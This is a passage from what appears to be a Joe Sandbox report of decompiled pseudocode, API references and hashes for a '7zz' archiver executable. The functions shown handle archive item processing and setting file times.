											_t356 = E00415BCA( *(_t596 - 0x10),  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											__eflags = _t356;
											 *(_t596 - 0x10) = _t356;
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											if(_t356 != 0) {
												 *(_t596 - 4) = 0x19;
												E0040862D();
												 *(_t596 - 4) = 0x11;
												E00408604(_t596 - 0x34);
												_t593 =  *(_t596 - 0x10);
												L83:
												E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
												_t308 = _t596 - 4;
												 *_t308 =  *(_t596 - 4) | 0xffffffff;
												__eflags =  *_t308;
												E00407A18( *((intOrPtr*)(_t596 - 0x74)));
												E0040B154(_t596 - 0x78);
												_t328 = _t593;
												goto L84;
											} else {
												 *(_t596 - 4) = 0x1a;
												goto L77;
											}
										} else {
											__eflags =  *(_t596 - 0x10);
											if( *(_t596 - 0x10) != 0) {
												goto L73;
											}
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											 *(_t596 - 4) = 0x18;
											goto L77;
										}
									} else {
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										 *(_t596 - 4) = 0x17;
										L77:
										E0040862D();
										 *(_t596 - 4) = 0x11;
										E00408604(_t596 - 0x34);
										 *(_t596 - 4) = 0x10;
										E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
										 *(_t596 - 0x38) =  *(_t596 - 0x38) + 1;
										E0040351A(_t596 - 0xd4);
										_push(_t596 - 0x11);
										 *(_t596 - 4) = 0x11;
										_t368 = E0040B5C9(_t596 - 0xfc);
										__eflags = _t368;
										if(_t368 != 0) {
											continue;
										}
										goto L78;
									}
								}
								 *(_t596 - 4) = 0x14;
								E0040862D();
								 *(_t596 - 4) = 0x12;
								E00408604(_t596 - 0x54);
								 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
								 *(_t596 - 4) = 0x15;
								goto L77;
							}
							__eflags =  *(_t596 - 0x38) - 0xff;
							if( *(_t596 - 0x38) != 0xff) {
								goto L60;
							}
							_t573 =  *( *(_t596 + 0x1c));
							 *(_t596 - 0x10) = _t573;
							asm("cdq");
							asm("cdq");
							_t373 =  *( *(_t596 - 0x10))( *((intOrPtr*)(_t581 + 8)), _t573,  *((intOrPtr*)(_t581 + 0x44)), _t573,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
							__eflags = _t373;
							if(_t373 != 0) {
								_t593 = _t373;
								goto L83;
							}
							_t581 =  *((intOrPtr*)(_t596 + 0x14));
							goto L60;
						}
						goto L79;
					}
					__eflags =  *(_t596 + 0x18);
					if( *(_t596 + 0x18) != 0) {
						goto L53;
					}
					__eflags =  *(_t469 + 0x2c);
					if( *(_t469 + 0x2c) <= 0) {
						L15:
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 !=  *(_t469 + 0x2c)) {
							goto L53;
						}
						E00404AD0(_t596 - 0x68, 1);
						 *((intOrPtr*)(_t596 - 0x68)) = 0x47ab08;
						 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
						 *(_t596 + 0x18) =  *(_t596 + 0x18) & 0x00000000;
						__eflags =  *(_t469 + 0x2c);
						if( *(_t469 + 0x2c) <= 0) {
							L37:
							_t388 = 0;
							__eflags =  *(_t469 + 0x18);
							 *(_t596 + 0x18) = 0;
							if( *(_t469 + 0x18) <= 0) {
								L50:
								 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
								E00408604(_t596 - 0x68);
								goto L80;
							} else {
								goto L38;
							}
							do {
								L38:
								__eflags = _t388 -  *((intOrPtr*)(_t596 - 0x60));
								if(_t388 >=  *((intOrPtr*)(_t596 - 0x60))) {
									L40:
									_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4));
									_push( *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4)) + 4);
									E0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
									 *(_t596 - 4) = 9;
									E0040351A(_t596 - 0x9c);
									_push( *((intOrPtr*)(_t596 - 0x20)));
									 *(_t596 - 4) = 0xa;
									_t393 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags);
									__eflags = _t393;
									if(_t393 != 0) {
										_t395 =  *(_t596 - 0xa4) >> 4;
										__eflags = _t395 & 0x00000001;
										if((_t395 & 0x00000001) != 0) {
											E00405B9F(_t596 - 0x54);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											 *(_t596 - 4) = 0xb;
											_push( *(_t596 + 0x1c));
											_push(0);
											_push( *((intOrPtr*)(_t596 + 0x14)));
											_push(_t596 - 0x54);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0x9c);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t585 = E00415BCA(_t584,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											 *(_t596 - 4) = 0xc;
											E0040862D();
											 *(_t596 - 4) = 0xa;
											E00408604(_t596 - 0x54);
											__eflags = _t585;
											if(_t585 != 0) {
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_push( *((intOrPtr*)(_t596 - 0x20)));
												L52:
												E00407A18();
												 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
												E00408604(_t596 - 0x68);
												_t328 = _t585;
												goto L84;
											}
											L48:
											E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
											_t170 = _t596 - 4;
											 *_t170 =  *(_t596 - 4) & 0x00000000;
											__eflags =  *_t170;
											E00407A18( *((intOrPtr*)(_t596 - 0x20)));
											goto L49;
										}
										_push(0x80004005);
										L46:
										E00415C6D( *((intOrPtr*)(_t596 + 0x24)));
										_push(_t596 - 0x20);
										E00406796( *((intOrPtr*)(_t596 + 0x20)));
										goto L48;
									}
									_t411 = E00408C9E(_t584);
									__eflags = _t411;
									if(_t411 == 0) {
										goto L48;
									}
									_push(GetLastError());
									goto L46;
								}
								_t532 =  *((intOrPtr*)(_t596 - 0x5c));
								__eflags =  *((char*)(_t532 + _t388));
								if( *((char*)(_t532 + _t388)) == 0) {
									goto L49;
								}
								goto L40;
								L49:
								_t388 =  *(_t596 + 0x18) + 1;
								__eflags = _t388 -  *(_t469 + 0x18);
								 *(_t596 + 0x18) = _t388;
							} while (_t388 <  *(_t469 + 0x18));
							goto L50;
						} else {
							goto L17;
						}
						do {
							L17:
							_t586 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) +  *(_t596 + 0x18) * 4));
							_t415 =  *((intOrPtr*)( *((intOrPtr*)(_t586 + 0xc))));
							_push(_t415);
							 *((intOrPtr*)(_t596 + 0x10)) = _t415;
							E0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
							 *(_t596 - 4) = 1;
							E0040351A(_t596 - 0x9c);
							_push( *((intOrPtr*)(_t596 - 0x20)));
							 *(_t596 - 4) = 2;
							_t418 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags); // executed
							__eflags = _t418;
							if(_t418 != 0) {
								_t473 =  *(_t596 - 0xa4) >> 0x00000004 & 0x00000001;
								__eflags = _t473;
								if(_t473 == 0) {
									__eflags =  *((char*)(_t586 + 0x15));
									if( *((char*)(_t586 + 0x15)) != 0) {
										L21:
										E00405B9F(_t596 - 0x34);
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										_push(_t596 - 0x9c);
										 *(_t596 - 4) = 3;
										_t421 = E00406796(_t596 - 0x34);
										__eflags = _t473;
										_t424 = E00408E8A( *(_t596 - 0x10), 0, _t596 - 0x34, _t421 & 0xffffff00 | _t473 == 0x00000000);
										__eflags = _t424;
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										if(_t424 == 0) {
											 *(_t596 - 4) = 5;
											E0040862D();
											 *(_t596 - 4) = 2;
											E00408604(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0x14)) + 0x3c);
											_push(_t596 - 0xc4);
											E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
											__eflags = _t473;
											if(_t473 == 0) {
												L35:
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_t116 = _t596 - 4;
												 *_t116 =  *(_t596 - 4) & 0x00000000;
												__eflags =  *_t116;
												E00407A18( *((intOrPtr*)(_t596 - 0x20)));
												_t469 =  *(_t596 - 0x10);
												goto L36;
											}
											E00405B9F(_t596 - 0x8c);
											 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
											 *(_t596 - 4) = 6;
											_t587 = E00408B37( *(_t596 - 0x10),  *((intOrPtr*)(_t596 + 0x10)));
											__eflags = _t587;
											if(_t587 < 0) {
												_push( *((intOrPtr*)(_t596 + 0x10)));
												_t588 =  *(_t596 - 0x10);
												E00406796(_t596 - 0x8c);
												L32:
												_push( *((intOrPtr*)(_t596 + 0x24)));
												_push( *((intOrPtr*)(_t596 + 0x20)));
												_push( *(_t596 + 0x1c));
												_push(1);
												_push( *((intOrPtr*)(_t596 + 0x14)));
												_push(_t596 - 0x8c);
												_push( *((intOrPtr*)(_t596 + 0xc)));
												_push(_t596 - 0x9c);
												_push( *((intOrPtr*)(_t596 + 8)));
												_t585 = E00415BCA(_t588,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
												 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
												__eflags = _t585;
												if(_t585 != 0) {
													 *(_t596 - 4) = 7;
													E0040862D();
													 *(_t596 - 4) = 2;
													E00408604(_t596 - 0x8c);
													E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
													_push( *((intOrPtr*)(_t596 - 0x20)));
													goto L52;
												}
												 *(_t596 - 4) = 8;
												E0040862D();
												 *(_t596 - 4) = 2;
												_t555 = _t596 - 0x8c;
												L34:
												E00408604(_t555);
												goto L35;
											}
											__eflags =  *((intOrPtr*)(_t596 - 0x60)) - _t587;
											if(__eflags > 0) {
												L30:
												 *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) =  *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) & 0x00000000;
												_t588 =  *( *((intOrPtr*)( *(_t596 - 0x10) + 0x1c)) + _t587 * 4);
												goto L32;
											}
											_t476 = _t587 -  *((intOrPtr*)(_t596 - 0x60)) + 1;
											__eflags = _t476;
											do {
												E0043AC2F(_t596 - 0x68, 1);
												_t476 = _t476 - 1;
												__eflags = _t476;
											} while (__eflags != 0);
											goto L30;
										}
										 *(_t596 - 4) = 4;
										E0040862D();
										 *(_t596 - 4) = 2;
										_t555 = _t596 - 0x34;
										goto L34;
									}
									L24:
									E00415C6D( *((intOrPtr*)(_t596 + 0x24)), 0x80004005);
									_push(_t596 - 0x20);
									E00406796( *((intOrPtr*)(_t596 + 0x20)));
									goto L35;
								}
								__eflags =  *((char*)(_t586 + 0x16));
								if( *((char*)(_t586 + 0x16)) == 0) {
									goto L24;
								}
								goto L21;
							}
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push(_t596 - 0x20);
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
							 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
							E00407A18( *((intOrPtr*)(_t596 - 0x20)));
							L36:
							 *(_t596 + 0x18) =  *(_t596 + 0x18) + 1;
							__eflags =  *(_t596 + 0x18) -  *(_t469 + 0x2c);
						} while ( *(_t596 + 0x18) <  *(_t469 + 0x2c));
						goto L37;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_t460 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) + _t590 * 4));
						__eflags =  *((char*)(_t460 + 0x14));
						if( *((char*)(_t460 + 0x14)) != 0) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t460 + 8)) - 1;
						if( *((intOrPtr*)(_t460 + 8)) != 1) {
							goto L15;
						}
						_t564 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0xc))));
						__eflags =  *(_t564 + 4);
						if( *(_t564 + 4) == 0) {
							goto L15;
						}
						_t462 = E00408A3B(_t564);
						__eflags = _t462;
						if(_t462 != 0) {
							goto L15;
						}
						_t590 = _t590 + 1;
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 <  *(_t469 + 0x2c)) {
							continue;
						}
						goto L15;
					}
					goto L15;
				}
				_t581 =  *((intOrPtr*)(_t596 + 0x14));
				_t579 =  *_t568;
				 *(_t596 - 0x38) = _t579;
				asm("cdq");
				asm("cdq");
				_t328 =  *( *(_t596 - 0x38))( *((intOrPtr*)(_t581 + 8)), _t579,  *((intOrPtr*)(_t581 + 0x44)), _t579,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
				if(_t328 == 0) {
					goto L7;
				}
				goto L84;
			}

0x00415425
0x00415435
0x00415439
0x0041543c
0x0041543f
0x0041544a
0x0041544a
0x0041544e
0x00415453
0x00415482
0x00415485
0x00415485
0x00415488
0x0041548a
0x0041548d
0x004158a9
0x004158ac
0x004158b1
0x004158b6
0x004158ba
0x004158c5
0x004158c9
0x004158d1
0x004158d5
0x004158da
0x004158e5
0x004158f0
0x004158f8
0x004158fc
0x00415901
0x00415903
0x00415b38
0x00415b42
0x00415b4a
0x00415b4d
0x00415b52
0x00415b58
0x00415b5d
0x00415b5d
0x00415b5d
0x00415b65
0x00415b6e
0x00415b73
0x00415b73
0x00415bb9
0x00415bbf
0x00415bc7
0x00415bc7
0x0041590e
0x0041590e
0x00415912
0x00000000
0x00000000
0x00415918
0x0041591c
0x00415953
0x00415956
0x0041595c
0x0041595f
0x0041596d
0x0041596e
0x00415972
0x0041597d
0x0041597e
0x00415992
0x0041599d
0x004159a2
0x004159a4
0x004159a7
0x004159d0
0x004159d4
0x004159dc
0x004159e0
0x00415a00
0x00415a02
0x00415a0d
0x00415a14
0x00415a15
0x00415a20
0x00415a23
0x00415a25
0x00415a27
0x00415a27
0x00415a25
0x00415a31
0x00415a34
0x00415a36
0x00415a44
0x00415a47
0x00415a4b
0x00415a4f
0x00415a5a
0x00415a5f
0x00415a61
0x00415a69
0x00415a69
0x00415a61
0x00415a6c
0x00415a70
0x00415a81
0x00415a84
0x00415a8c
0x00415a8f
0x00415a94
0x00415a98
0x00415aa3
0x00415aa4
0x00415aa7
0x00415aa7
0x00415aac
0x00415ab8
0x00415abb
0x00415abe
0x00415ac1
0x00415ac2
0x00415ac3
0x00415acc
0x00415acd
0x00415ad0
0x00415ad5
0x00415ad7
0x00415ada
0x00415add
0x00415b7e
0x00415b82
0x00415b8a
0x00415b8e
0x00415b93
0x00415b96
0x00415b9c
0x00415ba4
0x00415ba4
0x00415ba4
0x00415ba8
0x00415bb2
0x00415bb7
0x00000000
0x00415ae3
0x00415ae3
0x00000000
0x00415ae3
0x00415a72
0x00415a72
0x00415a76
0x00000000
0x00000000
0x00415a78
0x00415a7b
0x00000000
0x00415a7b
0x00415a38
0x00415a38
0x00415a3b
0x00415ae7
0x00415aea
0x00415af2
0x00415af6
0x00415afb
0x00415b05
0x00415b0a
0x00415b14
0x00415b1f
0x00415b27
0x00415b2b
0x00415b30
0x00415b32
0x00000000
0x00000000
0x00000000
0x00415b32
0x00415a36
0x004159ac
0x004159b0
0x004159b8
0x004159bc
0x004159c1
0x004159c4
0x00000000
0x004159c4
0x0041591e
0x00415922
0x00000000
0x00000000
0x0041592c
0x00415934
0x00415938
0x00415940
0x00415946
0x00415948
0x0041594a
0x00415b77
0x00000000
0x00415b77
0x00415950
0x00000000
0x00415950
0x00000000
0x0041590e
0x00415493
0x00415497
0x00000000
0x00000000
0x0041549d
0x004154a0
0x004154ce
0x004154ce
0x004154d1
0x00000000
0x00000000
0x004154dc
0x004154e1
0x004154eb
0x004154ef
0x004154f8
0x004154fa
0x00415723
0x00415723
0x00415725
0x00415728
0x0041572b
0x00415870
0x00415870
0x00415877
0x00000000
0x00000000
0x00000000
0x00000000
0x00415731
0x00415731
0x00415731
0x00415734
0x00415743
0x00415749
0x00415752
0x00415753
0x0041575e
0x00415762
0x00415767
0x00415770
0x00415774
0x00415779
0x0041577b
0x004157cc
0x004157cf
0x004157d1
0x004157f1
0x004157f6
0x004157f9
0x00415804
0x00415807
0x0041580b
0x0041580e
0x00415810
0x00415813
0x0041581a
0x0041581d
0x0041581e
0x00415826
0x00415828
0x0041582e
0x00415832
0x0041583a
0x0041583e
0x00415843
0x00415845
0x00415887
0x0041588c
0x0041588f
0x0041588f
0x00415894
0x0041589d
0x004158a2
0x00000000
0x004158a2
0x00415847
0x0041584d
0x00415855
0x00415855
0x00415855
0x00415859
0x00000000
0x0041585f
0x004157d3
0x004157d8
0x004157db
0x004157e6
0x004157e7
0x00000000
0x004157e7
0x0041577f
0x00415784
0x00415786
0x00000000
0x00000000
0x00415792
0x00000000
0x00415792
0x00415736
0x00415739
0x0041573d
0x00000000
0x00000000
0x00000000
0x00415860
0x00415863
0x00415864
0x00415867
0x00415867
0x00000000
0x00000000
0x00000000
0x00000000
0x00415500
0x00415500
0x00415509
0x00415512
0x00415514
0x00415515
0x00415518
0x00415523
0x00415527
0x0041552c
0x00415535
0x00415539
0x0041553e
0x00415540
0x00415584
0x00415584
0x00415587
0x004155e0
0x004155e4
0x0041558f
0x00415592
0x00415597
0x004155a3
0x004155a4
0x004155a8
0x004155ad
0x004155bc
0x004155c1
0x004155c3
0x004155c6
0x00415607
0x0041560b
0x00415613
0x00415617
0x00415628
0x0041562f
0x00415630
0x00415635
0x00415637
0x004156f8
0x004156fe
0x00415706
0x00415706
0x00415706
0x0041570a
0x0041570f
0x00000000
0x00415713
0x00415643
0x00415648
0x00415654
0x0041565d
0x0041565f
0x00415661
0x0041568d
0x00415690
0x00415699
0x0041569e
0x0041569e
0x004156ac
0x004156af
0x004156b2
0x004156b4
0x004156b7
0x004156be
0x004156c1
0x004156c2
0x004156ca
0x004156cc
0x004156d2
0x004156d4
0x0041579b
0x0041579f
0x004157aa
0x004157ae
0x004157b9
0x004157be
0x00000000
0x004157be
0x004156e0
0x004156e4
0x004156e9
0x004156ed
0x004156f3
0x004156f3
0x00000000
0x004156f3
0x00415663
0x00415666
0x0041567b
0x0041567e
0x00415688
0x00000000
0x00415688
0x0041566d
0x0041566d
0x0041566e
0x00415673
0x00415678
0x00415678
0x00415678
0x00000000
0x0041566e
0x004155cb
0x004155cf
0x004155d4
0x004155d8
0x00000000
0x004155d8
0x004155e6
0x004155ee
0x004155f9
0x004155fa
0x00000000
0x004155fa
0x00415589
0x0041558d
0x00000000
0x00000000
0x00000000
0x0041558d
0x0041554c
0x00415557
0x00415558
0x00415563
0x0041556b
0x0041556f
0x00415714
0x00415714
0x0041571a
0x0041571a
0x00000000
0x00000000
0x00000000
0x00000000
0x004154a2
0x004154a2
0x004154a5
0x004154a8
0x004154ac
0x00000000
0x00000000
0x004154ae
0x004154b2
0x00000000
0x00000000
0x004154b7
0x004154b9
0x004154bd
0x00000000
0x00000000
0x004154bf
0x004154c4
0x004154c6
0x00000000
0x00000000
0x004154c8
0x004154c9
0x004154cc
0x00000000
0x00000000
0x00000000
0x004154cc
0x00000000
0x004154a2
0x00415458
0x0041545b
0x00415465
0x00415468
0x00415471
0x00415477
0x0041547b
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00415425
GetLastError.KERNEL32(00000000,?,00000001,?,59@,00000000), ref: 00415542
GetLastError.KERNEL32(?,?,00000000,0000002A,?,59@,00000000), ref: 00415B38
GetLastError.KERNEL32(00000000,00000000,00000001,?,59@,00000000), ref: 0041578C

Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B

Part of subcall function 004092A8: __EH_prolog.LIBCMT ref: 004092AD

Strings

59@, xrefs: 00415437, 004154F3, 00415909

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorH_prologLast
String ID: 59@
API String ID: 1057991267-2780377667
Opcode ID: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
Instruction ID: 1d40638168d81cf388170db04f18bdef8ab4a9340640ae64ab53dda31c2c3f9c
Opcode Fuzzy Hash: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
Instruction Fuzzy Hash: 6C428D7090424DEFDF11DFA0C981BEDBBB5AF54308F1041AAE84577292DB38AE85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004098CF Relevance: 9.1, APIs: 6, Instructions: 73
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004098CF(WCHAR* __ecx, FILETIME* __edx) {
				void* _t26;
				signed int _t27;
				int _t28;
				signed int _t37;
				void* _t52;

				E0046B890(E00473A10, _t52);
				 *(_t52 - 0x18) = __edx;
				 *((intOrPtr*)(_t52 - 0x14)) = __ecx;
				if( *0x490a7c != 0) {
					_t26 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					 *(_t52 - 0x10) = _t26;
					if(_t26 == 0xffffffff) {
						 *(_t52 - 0x24) = 0;
						 *((intOrPtr*)(_t52 - 0x20)) = 0;
						 *((intOrPtr*)(_t52 - 0x1c)) = 0;
						E00401E9A(_t52 - 0x24, 3);
						 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
						if(E0040B863(_t52 - 0x24) != 0) {
							 *(_t52 - 0x10) = CreateFileW( *(_t52 - 0x24), 0x40000000, 3, 0, 3, 0x2000000, 0);
						}
						E00407A18( *(_t52 - 0x24));
					}
					_t37 = 0;
					if( *(_t52 - 0x10) != 0xffffffff) {
						_t28 = SetFileTime( *(_t52 - 0x10),  *(_t52 - 0x18),  *(_t52 + 8),  *(_t52 + 0xc)); // executed
						_t37 = 0 | _t28 != 0x00000000;
						CloseHandle( *(_t52 - 0x10));
					}
					_t27 = _t37;
				} else {
					SetLastError(0x78);
					_t27 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t27;
			}

0x004098d4
0x004098e3
0x004098e6
0x004098e9
0x00409918
0x0040991d
0x00409920
0x00409929
0x0040992c
0x0040992f
0x00409932
0x0040993a
0x00409948
0x00409959
0x00409959
0x0040995f
0x00409964
0x00409965
0x0040996b
0x00409979
0x00409984
0x00409987
0x00409987
0x0040998e
0x004098eb
0x004098ed
0x004098f3
0x004098f3
0x00409995
0x0040999d

APIs

__EH_prolog.LIBCMT ref: 004098D4
SetLastError.KERNEL32(00000078), ref: 004098ED
CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409918
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409957
SetFileTime.KERNELBASE(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409979
CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409987

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: File$Create$CloseErrorH_prologHandleLastTime
String ID:
API String ID: 1562325489-0
Opcode ID: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
Instruction ID: e76a05e07f1340f2f4d5a0f82b1dd14c97c15875a5f06524ffc792fdba8d9db0
Opcode Fuzzy Hash: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
Instruction Fuzzy Hash: 7E218C71940209AAEF11AFA4DC02BEEBBB8EF48710F10453AE514B62E1D3790E00CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412027 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 954
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00412027() {
				void* __ebx;
				void* __esi;
				intOrPtr* _t416;
				signed int _t418;
				signed int _t422;
				signed int _t425;
				signed int _t429;
				signed int _t434;
				signed int _t440;
				signed int _t461;
				signed int _t462;
				signed int _t474;
				signed int _t475;
				void* _t476;
				signed int _t479;
				signed int _t480;
				signed int _t490;
				void* _t508;
				signed int _t511;
				intOrPtr* _t512;
				signed int _t515;
				intOrPtr _t516;
				void* _t517;
				void* _t518;
				signed int _t522;
				void* _t533;
				void* _t534;
				void* _t536;
				signed int _t540;
				signed int _t559;
				void* _t570;
				void* _t571;
				signed int _t575;
				signed int _t584;
				signed int _t585;
				signed int _t589;
				signed int _t593;
				intOrPtr _t627;
				signed int _t628;
				void* _t633;
				signed int _t637;
				void* _t643;
				signed int _t651;
				intOrPtr _t681;
				signed int _t754;
				intOrPtr _t791;
				FILETIME* _t793;
				intOrPtr* _t796;
				signed int* _t797;
				intOrPtr* _t798;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t810;
				signed int _t812;
				intOrPtr* _t813;
				signed int _t814;
				intOrPtr* _t815;
				intOrPtr* _t816;
				signed int _t817;
				intOrPtr* _t818;
				intOrPtr* _t819;
				signed int _t821;
				void* _t822;
				void* _t824;

				E0046B890(E0047455B, _t822);
				_t810 =  *(_t822 + 8);
				_t651 = 0;
				 *((intOrPtr*)(_t822 - 0x10)) = _t824 - 0x9c;
				_t416 =  *((intOrPtr*)(_t810 + 0xa0));
				_t796 = _t810 + 0xa0;
				 *((intOrPtr*)(_t822 - 4)) = 0;
				if(_t416 != 0) {
					 *((intOrPtr*)( *_t416 + 8))(_t416);
					 *_t796 = 0;
				}
				_t797 = _t810 + 0x98;
				 *( *(_t822 + 0x10)) = _t651;
				_t418 =  *_t797;
				if(_t418 != _t651) {
					 *((intOrPtr*)( *_t418 + 8))(_t418);
					 *_t797 = _t651;
				}
				 *(_t810 + 0x88) = _t651;
				 *(_t810 + 0x5d) = _t651;
				 *(_t810 + 0x58) = _t651;
				 *(_t810 + 0x8c) = _t651;
				 *(_t810 + 0x90) = _t651;
				 *(_t810 + 0x84) =  *(_t822 + 0xc);
				 *(_t822 - 0x48) = _t651;
				 *(_t822 - 0x44) = _t651;
				 *(_t822 - 0x40) = _t651;
				E00401E9A(_t822 - 0x48, 3);
				_push(_t822 - 0x48);
				 *((char*)(_t822 - 4)) = 1;
				_push( *(_t822 + 0xc));
				_t798 =  *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10))));
				_t422 = E004179F7( *((intOrPtr*)(_t810 + 0x10)));
				if(_t422 == _t651) {
					_t422 = E004179E9(_t810 + 0x80);
					__eflags = _t422 - _t651;
					if(_t422 != _t651) {
						goto L5;
					}
					E00401E26(_t810 + 0x44, _t822 - 0x48);
					 *(_t822 - 0x70) = _t651;
					 *(_t822 - 0x6e) = _t651;
					 *((char*)(_t822 - 4)) = 2;
					_t429 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 0x1d, _t822 - 0x70);
					__eflags = _t429 - _t651;
					 *(_t822 + 8) = _t429;
					if(_t429 == _t651) {
						__eflags =  *(_t822 - 0x70) - _t651;
						if( *(_t822 - 0x70) == _t651) {
							L13:
							 *((char*)(_t822 - 4)) = 1;
							E0040C20F(_t822 - 0x70);
							_push(_t810 + 0x5d);
							_push(0xf);
							_t422 = E00417975(_t798,  *(_t822 + 0xc));
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							_t422 = E00411FA9(_t810);
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x14)) - _t651;
